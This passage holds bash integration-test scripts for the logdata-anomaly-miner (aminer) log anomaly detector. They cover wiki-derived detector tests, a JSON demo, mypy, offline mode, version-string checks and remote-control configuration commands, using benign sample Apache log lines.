Compare the results with the outputs between between 20th and 21st ```. # 12.) Write LOG_BOB to LOG and wait until realert_interval is over and compare the results with the outputs between between 24th and 25th ```. # 13.) Extract the CMD between 35th and 36th ```, run it and compare the results to the output. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-MissingMatchPathValueDetector.md OUT=/tmp/out.txt OUT_AMINER=/tmp/aminer_output.txt LOG=/tmp/access.log CFG_PATH=/etc/aminer/config.yml # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sudo rm -rf /var/lib/aminer/* exit_code=0 # write config (1.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # adapt config (2.) sed "s?file:///var/log/apache2/access.log?file:///${LOG}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null echo "Core.PersistencePeriod: 1" | sudo tee -a $CFG_PATH > /dev/null # write log lines (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT LOG_ALICE="$(sed -n '2p' < $OUT)" LOG_BOB="${LOG_ALICE/alice/bob}" echo "$LOG_ALICE" > $LOG # extract and run aminer command (4.) awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD=${CMD#*$ } OLD_CFG_PATH=/${CMD#*/} AMINER_CMD="${CMD/"$OLD_CFG_PATH"/"$CFG_PATH"}" runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" PID=$! # compare results (5.) IN=$(tail -n +2 $OUT) OUTPUT=$(tail -n +2 $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 5." 
exit_code=$((exit_code | $?)) # extract and run CMD and compare output (6.) awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD="$(sed -n '1p' < $OUT)" IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT=$($CMD) IN="$(sed -n '2p' < $OUT)" compareStrings "$IN" "$OUTPUT" "Failed Test in 6." exit_code=$((exit_code | $?)) # extract and run CMD and compare output (7.) #awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT #CMD="$(sed -n '1p' < $OUT)" #IFS='$' read -ra ADDR <<< "$CMD" #CMD="${ADDR[1]}" #OUTPUT=$($CMD) #IN="$(sed -n '2p' < $OUT)" #compareStrings "$IN" "$OUTPUT" "Failed Test in 7." #exit_code=$((exit_code | $?)) # set LearnMode False (8.) sed "s/LearnMode: True/LearnMode: False/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # run aminer CMD (9.) rm $LOG # write log lines (10.) cat < $LOG ::1 - - [18/Jul/2020:20:28:01 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:02 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:03 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:04 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:05 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:06 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:07 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:08 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:09 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:10 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:11 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:12 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:13 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" EOT runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" "not exit aminer" PID=$! 
# compare results (11.) awk '/^```$/ && ++n == 20, /^```$/ && n++ == 21' < $INPUT_FILE | sed '/^```/ d' > $OUT IN=$(cat $OUT) OUTPUT=$(cat $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 11." exit_code=$((exit_code | $?)) # add data and compare results (12.) cat < $LOG ::1 - - [18/Jul/2020:20:28:14 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:15 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:16 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:17 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:18 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:19 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:20 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:21 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:22 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:23 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:24 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:25 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:26 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:27 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:28 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:29 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:30 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:31 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:32 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:33 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:34 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:35 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:36 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - 
[18/Jul/2020:20:28:37 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:38 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:39 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:40 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:41 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:42 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:43 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" EOT FILE_SIZE=`stat --printf="%s" $LOGFILE 2> /dev/null` IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=0 while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 20 ]]; do sleep 1 IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=$((++CNTR)) done sleep 8 sudo pkill -x aminer wait $PID awk '/^```$/ && ++n == 24, /^```$/ && n++ == 25' < $INPUT_FILE | sed '/^```/ d' > $OUT IN=$(cat $OUT) OUTPUT=$(tail -n 4 $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 12." exit_code=$((exit_code | $?)) # extract command, run it and compare results (13.) awk '/^```$/ && ++n == 35, /^```$/ && n++ == 36' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD="$(sed -n '1p' < $OUT)" IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT=$($CMD) IN="$(sed -n '2p' < $OUT)" compareStrings "$IN" "$OUTPUT" "Failed Test in 13." 
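exit_code=$((exit_code | $?))
sudo rm -r logdata-anomaly-miner.wiki
sudo rm $CFG_PATH
rm $OUT
rm $LOG
exit $exit_code

# ---- aecid-testsuite/runJsonDemo.sh ----
#!/bin/bash
# Run the JSON input demo (demo/aminerJsonInputDemo/json-demo.sh) against a
# scratch persistence directory and fail when its output contains unparsed
# atoms, decoding errors, config errors or Python tracebacks.
# The optional first argument is passed through to json-demo.sh unchanged.
OUT=/tmp/out.txt
AMINER_PERSISTENCE_DIR=/tmp/lib/aminer

# Fresh, aminer-owned persistence directory. Errors such as "already exists"
# or "nothing to delete" are silenced on purpose; the demo itself fails
# loudly if the directory is unusable.
sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir "$AMINER_PERSISTENCE_DIR" 2> /dev/null
sudo chown -R "$USER:$USER" "$AMINER_PERSISTENCE_DIR" 2> /dev/null
sudo rm -r "$AMINER_PERSISTENCE_DIR"/* 2> /dev/null
sudo chown -R aminer:aminer "$AMINER_PERSISTENCE_DIR" 2> /dev/null
sudo rm "$OUT" 2> /dev/null

cp -r ./demo/aminerJsonInputDemo/json_logs /tmp/json_logs
cp -r ./demo/aminerJsonInputDemo/windows_json_logs /tmp/windows_json_logs

# ${1:+"$1"} forwards the argument only when one was given, so json-demo.sh
# sees the same argument count as before.
sudo ./demo/aminerJsonInputDemo/json-demo.sh ${1:+"$1"} "$OUT"
exit_code=$?

# Any of these markers in the demo output is a failure. The tail of the
# output from the first occurrence is printed for diagnosis; `sed -n` is
# required here, without it every line of the file is printed a second time.
for marker in VerboseUnparsedAtomHandler UnicodeDecodeError Config-Error Traceback; do
  if grep -Fq "$marker" "$OUT"; then
    exit_code=1
    sed -n "/$marker/,\$p" "$OUT"
  fi
done

sudo rm "$OUT"
sudo rm -r /tmp/json_logs
sudo rm -r /tmp/windows_json_logs
exit $exit_code

# ---- aecid-testsuite/runMypy.sh ----
#!/bin/bash
# Type-check the installed aminer package with mypy, one subpackage at a time
# and finally the package as a whole. The exit code is the sum of the
# individual mypy exit codes, so any failing run makes the script exit
# non-zero.
AMINER_ROOT=/usr/lib/logdata-anomaly-miner/aminer
exit_code=0
# The empty last entry checks $AMINER_ROOT/ itself.
for target in analysis/ events/ input/ parsing/ util/ ""; do
  mypy "$AMINER_ROOT/$target" --ignore-missing-imports
  exit_code=$((exit_code + $?))
done
exit $exit_code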
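# ---- aecid-testsuite/runOfflineMode.sh ----
#!/bin/bash
# Run aminer once in offline mode over the integration fixtures and check
# that every expected "New path(es) detected" report appears in its output.
PERSISTENCE_DIR=/tmp/lib/aminer
OUT=/tmp/out.txt

# Fresh, aminer-owned persistence directory (errors such as "already exists"
# are silenced on purpose).
sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir "$PERSISTENCE_DIR" 2> /dev/null
sudo chown -R "$USER:$USER" "$PERSISTENCE_DIR" 2> /dev/null
sudo rm -r "$PERSISTENCE_DIR"/* 2> /dev/null
sudo mkdir "$PERSISTENCE_DIR/log" 2> /dev/null
sudo chown -R aminer:aminer "$PERSISTENCE_DIR" 2> /dev/null
sudo cp ./integration/offline_mode/data/* /tmp/

exit_code=0

# Start aminer. Offline mode terminates on its own once the input has been
# consumed; if aminer gets stuck, the CI job's timeout is expected to fail
# the build.
sudo aminer --config ./integration/offline_mode/offline_mode.yml --offline-mode --from-begin > "$OUT"
OUTPUT=$(cat "$OUT")

# Print the report aminer emits for a newly seen value ($1) of /model/data.
# NOTE(review): the whitespace of these report lines was lost when the test
# was extracted; the exact indentation aminer prints should be confirmed.
expected_report() {
  read -r -d '' REPORT << END
New path(es) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model/data: $1
['/model/data']
$1
END
  printf '%s' "$REPORT"
}

# One report is expected per fixture value; a missing report is echoed so the
# CI log shows which one was not found.
for value in a1 b1 c1 z1 a2 b2 c2 z2; do
  VAR=$(expected_report "$value")
  if [[ "$OUTPUT" != *"$VAR"* ]]; then
    echo "$VAR"
    echo
    exit_code=1
  fi
done

sudo rm /tmp/file1.log
sudo rm /tmp/file2.log
exit $exit_code

# ---- aecid-testsuite/runReleaseStringCheck.sh ----
#!/bin/bash
# Check that the package version in metadata.py matches the documentation
# release string in docs/conf.py. With -u/--update the older of the two is
# rewritten to the newer one (decided by compareVersionStrings from
# testFunctions.sh); the script still exits 1 in that case so the mismatch
# is noticed, and exits 0 only when both strings already agree.
. ./testFunctions.sh

METADATA_PATH=../source/root/usr/lib/logdata-anomaly-miner/metadata.py
CONF_PATH=../docs/conf.py

# metadata.py holds:  __version__ = "x.y.z"
version=$(grep "__version__ =" "$METADATA_PATH" | sed -e 's/__version__ = //g' -e 's/"//g')
# docs/conf.py holds: release = 'x.y.z'
release=$(grep "release =" "$CONF_PATH" | sed -e 's/release = //g' -e "s/'//g")

if [[ "$version" == "" || "$release" == "" ]]; then
  echo "Could not read the version string from $METADATA_PATH or the release string from $CONF_PATH." >&2
  exit 1
fi

if [[ "$version" != "$release" ]]; then
  echo "Version $version not equal with $release."
  if [[ $# -eq 1 ]]; then
    if [[ "$1" != "-u" && "$1" != "--update" ]]; then
      echo "Unknown Parameter $1. Exiting.."
      exit 1
    fi
    compareVersionStrings "$version" "$release"
    res=$?
    # presumably 1 means metadata.py carries the newer string and 2 that
    # conf.py does — confirm against testFunctions.sh.
    if [[ $res -eq 1 ]]; then
      sed -i "s/release = '$release'/release = '$version'/g" "$CONF_PATH"
      echo "Updated version string in $CONF_PATH from $release to $version."
    elif [[ $res -eq 2 ]]; then
      sed -i "s/__version__ = \"$version\"/__version__ = \"$release\"/g" "$METADATA_PATH"
      echo "Updated version string in $METADATA_PATH from $version to $release."
    fi
  fi
  # A mismatch is always reported as failure, even after an update.
  exit 1
fi

# ---- aecid-testsuite/runRemoteControlTest.sh (continues on the following lines) ----
# Exercise aminerremotecontrol against a running aminer started from a copy
# of the remote-control demo config. Every command that is sent is also
# appended to CMD_PATH so that --exec-file can be exercised later.
FILE=/tmp/demo-config.py
CMD_PATH=/tmp/commands.txt
# Constants and the failure flag are set before the first check, so that a
# failure of the --exec-file probe is not overwritten by a later
# "exit_code=0" and "$ERROR" is never expanded while still empty.
PREFIX="Remote execution response: "
NOT_FOUND_WARNINGS="WARNING: config_properties['Core.PersistencePeriod'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsLevel'] = not found in the old config file.\nWARNING: config_properties['Log.DebugLevel'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsPeriod'] = not found in the old config file.\n"
ERROR="Error at:"
exit_code=0
expected_list=""

sudo cp demo/aminerRemoteControl/demo-config.py "$FILE"
# Redirect the demo's StreamPrinterEventHandler output into /tmp/log.txt.
sudo sed -i 's/StreamPrinterEventHandler(analysis_context)/StreamPrinterEventHandler(analysis_context, stream=open("\/tmp\/log.txt", "a"))/g' "$FILE"
sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir /tmp/lib/aminer 2> /dev/null
sudo mkdir /tmp/lib/aminer/log 2> /dev/null
sudo rm -r /tmp/lib/aminer/* 2> /dev/null
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo rm /tmp/syslog 2> /dev/null
touch /tmp/syslog

# Start aminer in the background. The redirection belongs before "&"; in the
# form "... & > /dev/null" it applied to an empty command and aminer's
# stdout was not silenced.
sudo aminer --config "$FILE" > /dev/null &
sleep 1

# --exec-file with a not yet existing file must be rejected.
stdout=$(sudo aminerremotecontrol --exec-file "$CMD_PATH")
expected="File $CMD_PATH does not exist"
if [[ "$stdout" != "$expected" ]]; then
  echo "$ERROR exec-file not exists."
  echo "$stdout"
  echo "Expected: $expected"
  echo
  exit_code=1
fi

START_TIME=$(date +%s)

echo "print_config_property(analysis_context, 'Core.PersistenceDir')" >> "$CMD_PATH"
stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistenceDir')")
expected="$PREFIX'\"Core.PersistenceDir\": /tmp/lib/aminer'"
expected_list="${expected_list}${expected} "
if [[ "$stdout" != "$expected" ]]; then
  echo "$ERROR error printing 'Core.PersistenceDir'."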
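# Remainder of the 'Core.PersistenceDir' check whose 'if' precedes this point.
echo "$stdout"
echo "Expected: $expected"
echo
exit_code=1
fi

# Run one remote-control command: append it to the replay file CMD_PATH, execute it
# through --exec and record the reply that the later --exec-file run has to reproduce.
#   $1 command handed to aminerremotecontrol --exec
#   $2 expected reply (exact match, PREFIX included)
#   $3 description printed after ERROR when the reply differs
#   $4 optional second reply that is accepted as well (e.g. a resource-dependent FAILURE)
# Leaves the raw reply in the global 'stdout' and sets exit_code=1 on a mismatch.
run_remote_check() {
  local cmd="$1" expected="$2" description="$3" alternative="${4-}"
  echo "$cmd" >> "$CMD_PATH"
  stdout=$(sudo aminerremotecontrol --exec "$cmd")
  # Record the reply that was actually received when it is the accepted alternative,
  # so the replay comparison at the end of the script sees the same text again.
  if [[ -n "$alternative" && "$stdout" == "$alternative" ]]; then
    expected_list+="${stdout}"$'\n'
  else
    expected_list+="${expected}"$'\n'
  fi
  if [[ "$stdout" != "$expected" && ( -z "$alternative" || "$stdout" != "$alternative" ) ]]; then
    echo "$ERROR $description"
    echo "$stdout"
    echo "Expected: $expected"
    echo
    exit_code=1
  fi
}

# Like run_remote_check, but only the beginning of the reply is compared and nothing is
# recorded for the replay, because the reply carries run-dependent data (backup names).
#   $1 command, $2 expected reply prefix, $3 description for the error message
run_remote_check_prefix() {
  local cmd="$1" expected_prefix="$2" description="$3"
  stdout=$(sudo aminerremotecontrol --exec "$cmd")
  if [[ "$stdout" != "$expected_prefix"* ]]; then
    echo "$ERROR $description"
    echo "$stdout"
    echo "Expected: $expected_prefix"
    echo
    exit_code=1
  fi
}

run_remote_check "print_config_property(analysis_context, 'Core.PersistencePeriod')" \
  "$PREFIX'\"Resource \\\\\"Core.PersistencePeriod\\\\\" could not be found.\"'" \
  "error printing 'Core.PersistencePeriod'."

# check if proper mail address validation is done.
# only test 'MailAlerting.TargetAddress' to reduce runtime and expect 'MailAlerting.FromAddress' to work the same way.
properties=("'MailAlerting.TargetAddress'")
valid_addresses=("'test123@gmail.com'" "'root@localhost'")
error_addresses=("'domain.user1@localhost'" "'root@notLocalhost'")
for property in "${properties[@]}"; do
  for address in "${valid_addresses[@]}"; do
    run_remote_check "change_config_property(analysis_context, $property, $address)" \
      "$PREFIX\"$property changed to $address successfully.\"" \
      "changing $property to $address."
  done
  for address in "${error_addresses[@]}"; do
    run_remote_check "change_config_property(analysis_context, $property, $address)" \
      "$PREFIX'FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!'" \
      "changing $property to $address."
  done
done

INTEGER_CONFIG_PROPERTIES=("'MailAlerting.AlertGraceTime'" "'MailAlerting.EventCollectTime'" "'MailAlerting.MinAlertGap'" "'MailAlerting.MaxAlertGap'" "'MailAlerting.MaxEventsPerMessage'" "'Core.PersistencePeriod'" "'Log.StatisticsLevel'" "'Log.DebugLevel'" "'Log.StatisticsPeriod'" "'Resources.MaxMemoryUsage'")
STRING_CONFIG_PROPERTIES=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'" "'MailAlerting.SubjectPrefix'" "'LogPrefix'")
# Reply that is accepted instead of the regular one for the memory limit property
# (presumably 'Resources.MaxMemoryUsage'; the script accepts it for every integer property).
RAM_FAILURE="$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'"

# NOTE(review): the type name appears to be missing between "of type" and "!" in the
# type-failure replies below; confirm against a live aminerremotecontrol reply.
for property in "${STRING_CONFIG_PROPERTIES[@]}"; do
  run_remote_check "change_config_property(analysis_context, $property, 123)" \
    "$PREFIX\"FAILURE: the value of the property $property must be of type !\"" \
    "changing $property wrong Type."
  run_remote_check "change_config_property(analysis_context, $property, 'root@localhost')" \
    "$PREFIX\"$property changed to 'root@localhost' successfully.\"" \
    "changing $property to 'root@localhost'."
done

for property in "${INTEGER_CONFIG_PROPERTIES[@]}"; do
  run_remote_check "change_config_property(analysis_context, $property, '1')" \
    "$PREFIX\"FAILURE: the value of the property $property must be of type !\"" \
    "changing $property wrong Type." "$RAM_FAILURE"
  run_remote_check "change_config_property(analysis_context, $property, 1)" \
    "$PREFIX\"$property changed to '1' successfully.\"" \
    "changing $property to 1." "$RAM_FAILURE"
done

# Statistics and debug level accept exactly 0, 1 and 2; the FAILURE reply names
# STAT_LEVEL or DEBUG_LEVEL depending on the property, so both variants are accepted.
properties=("'Log.StatisticsLevel'" "'Log.DebugLevel'")
for property in "${properties[@]}"; do
  for value in 0 1 2; do
    run_remote_check "change_config_property(analysis_context, $property, $value)" \
      "$PREFIX\"$property changed to '$value' successfully.\"" \
      "changing $property to $value."
  done
  for value in -1 3; do
    run_remote_check "change_config_property(analysis_context, $property, $value)" \
      "$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. Allowed STAT_LEVEL values are 0, 1, 2.'" \
      "changing $property to $value." \
      "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'"
  done
done

run_remote_check "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" \
  "$PREFIX\"Component 'NewMatchPathValueCombo' renamed to 'NewMatchPathValueComboDetector' successfully.\"" \
  "renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector'."
run_remote_check "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)" \
  "$PREFIX\"FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str.\"" \
  "renames the 'NewMatchPathValueComboDetector' wrong Type. (no string; integer value)"
run_remote_check "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')" \
  "$PREFIX\"FAILURE: the component 'NonExistingDetector' does not exist.\"" \
  "renames a non existing component to 'NewMatchPathValueComboDetector'."

run_remote_check "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" \
  "$PREFIX\"'NewMatchPathValueComboDetector.learn_mode' changed from False to False successfully.\"" \
  "changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False."
# same "of type !" caveat as for the config property type checks above.
run_remote_check "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')" \
  "$PREFIX\"FAILURE: property 'NewMatchPathValueComboDetector.learn_mode' must be of type !\"" \
  "changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' wrong Type."

run_remote_check "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" \
  "$PREFIX'\"NewMatchPathValueComboDetector.target_path_list\": [\"/model/IPAddresses/Username\", \"/model/IPAddresses/IP\"]'" \
  "prints the current list of paths."
run_remote_check "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')" \
  "$PREFIX\"FAILURE: the component 'NewMatchPathValueComboDetector' does not have an attribute named 'other_path_list'.\"" \
  "prints not existing attribute."

run_remote_check "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')" \
  "$PREFIX\"Component 'NewMatchPathDet' added to 'AtomFilter' successfully.\"" \
  "add a new NewMatchPathDetector to the config."
run_remote_check "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')" \
  "$PREFIX\"FAILURE: 'component' must implement the AtomHandlerInterface!\"" \
  "add a wrong class to the config."

# NOTE(review): the config is written by the privileged aminer process to a fixed path
# in /tmp; acceptable for this test harness only.
run_remote_check "save_current_config(analysis_context,'/tmp/config.py')" \
  "${PREFIX}\"${NOT_FOUND_WARNINGS}Successfully saved the current config to /tmp/config.py.\"" \
  "save the current config to /tmp/config.py."
sudo rm /tmp/config.py
run_remote_check "save_current_config(analysis_context,'[/path/config.py')" \
  "${PREFIX}'Exception: [/path/config.py is not a valid filename!'" \
  "save the current config to an invalid path."
run_remote_check "save_current_config(analysis_context,'/notExistingPath/config.py')" \
  "${PREFIX}\"${NOT_FOUND_WARNINGS}FAILURE: file '/notExistingPath/config.py' could not be found or opened!\"" \
  "save the current config to an not existing directory path."

run_remote_check "persist_all()" "${PREFIX}'OK'" "persist_all."

# Backup replies contain run-dependent names, so they are neither replayed nor recorded.
run_remote_check_prefix "create_backup(analysis_context)" "${PREFIX}'Created backup " "creating backup."
run_remote_check_prefix "list_backups(analysis_context)" "${PREFIX}'\"backups\": [" "listing backups."

timestamp=$(date +%s)
run_remote_check "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,'/model/path'),allowlisting_data=None)" \
  "${PREFIX}\"Allowlisted path(es) /model/DailyCron/UName, /model/DailyCron/JobNumber with ($timestamp, '/model/path').\"" \
  "allowlist_event EnhancedNewMatchPathDetector."
run_remote_check "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)" \
  "${PREFIX}\"Updated ' ' in '/model/DiskReport/Space' to new interval 2.\"" \
  "allowlist_event MissingMatchPathDetector."
run_remote_check "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)" \
  "${PREFIX}'Allowlisted path(es) /model/somepath in Analysis.NewMatchPathDetector.'" \
  "allowlist_event NewMatchPathDetector."
run_remote_check "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector','/model/somepath',allowlisting_data=None)" \
  "${PREFIX}'Allowlisted path(es) /model/IPAddresses/Username, /model/IPAddresses/IP with /model/somepath.'" \
  "allowlist_event NewMatchPathValueCombo."
run_remote_check "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector','/model/somepath',allowlisting_data=None)" \
  "${PREFIX}'Allowlisted path(es) /model/type/path/name, /model/type/syscall/syscall with /model/somepath.'" \
  "allowlist_event NewMatchIdValueComboDetector."
run_remote_check "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)" \
  "${PREFIX}'Allowlisted path /model/somepath.'" \
  "allowlist_event EventCorrelationDetector."
run_remote_check "allowlist_event_in_component(analysis_context,'NewMatchPathValue','/model/somepath',allowlisting_data=None)" \
  "${PREFIX}'Allowlisted path(es) /model/DailyCron/Job Number, /model/IPAddresses/Username with /model/somepath.'" \
  "allowlist_event NewMatchPathValueDetector."
# The blocklist call is issued twice; both replies are recorded so the replay file matches.
for _ in 1 2; do
  run_remote_check "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" \
    "${PREFIX}'Blocklisted path /model/somepath.'" \
    "blocklist_event EventCorrelationDetector."
done

EXEC_TIME=$(($(date +%s)-START_TIME))

# print_current_config returns the whole configuration; a reply of 'None' indicates
# an execution error, so this check is inverted compared to the others.
echo "print_current_config(analysis_context)" >> "$CMD_PATH"
stdout=$(sudo aminerremotecontrol --exec "print_current_config(analysis_context)")
expected="$PREFIX None"
if [[ "$stdout" == "$expected" ]]; then
  echo "$ERROR print config had an execution error."
  echo "$stdout"
  echo "Expected: $expected"
  echo
  exit_code=1
fi
# next_persist_time differs between runs, so it is stripped before the reply is recorded.
stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//")
expected_list+="${stdout}"$'\n'

run_remote_check "reopen_event_handler_streams(analysis_context)" \
  "$PREFIX'Reopened all StreamPrinterEventHandler streams.'" \
  "reopen_event_handler_streams had an execution error."

sudo pkill -x aminer
sleep 2 & wait $!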
